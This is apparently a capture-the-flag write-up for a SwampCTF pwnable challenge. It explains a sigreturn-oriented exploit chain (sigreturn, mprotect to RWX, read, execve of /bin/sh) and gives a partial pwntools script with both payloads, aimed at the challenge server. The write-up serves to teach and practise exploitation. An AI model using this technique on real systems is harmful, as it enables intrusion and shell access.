Tags: sigreturn pwnable 

Rating: 3.0

This is similar to Backdoor 2017 challenge [funsignals](https://backdoor.sdslabs.co/challenges/FUNSIGNALS). reading user input to stack and excute syscalls. except:
1. .text segment is readonly;
2. flag is not stored in memory;

To resolve above issues, we need multiple syscalls.
1. a sigreturn syscall to change the program flow.
2. a mprotect syscall to remap text segment to RWX.
3. a syscall to read new playload (using the one provided in binary), since stack are switched and old payload are invalidated.
4. a final execve syscall to spawn a shell.

from pwn import *

p = remote('chal1.swampctf.com',1800)

#Sigreturn frame for SYS_mprotect
frame = SigreturnFrame()
frame.rax = 10 # SYS_mprotect
frame.rdi = 0x400000 # addr
frame.rsi = 0x1000 # len
frame.rdx = 7 # proto
frame.rsp = 0x400400 # point new rsp after the code section
frame.rip = 0x400104 # to the 1st syscall instruction, so we can then read second payload on new stack and execute.
# syscall (rax = SYS_rt_sigreturn)
payload1 = p64(0)*3+p64(15)+p64(0)*4+str(frame)
# syscall (rax = SYS_execve, rsi = rdx = 0, rdi = addr of '/bin/sh' (placed just after the register values)
payload2 = p64(0)*3+p64(59)+p64(0)*3+p64(0x400440)+'/bin/sh\0'
print p.recvline().strip()

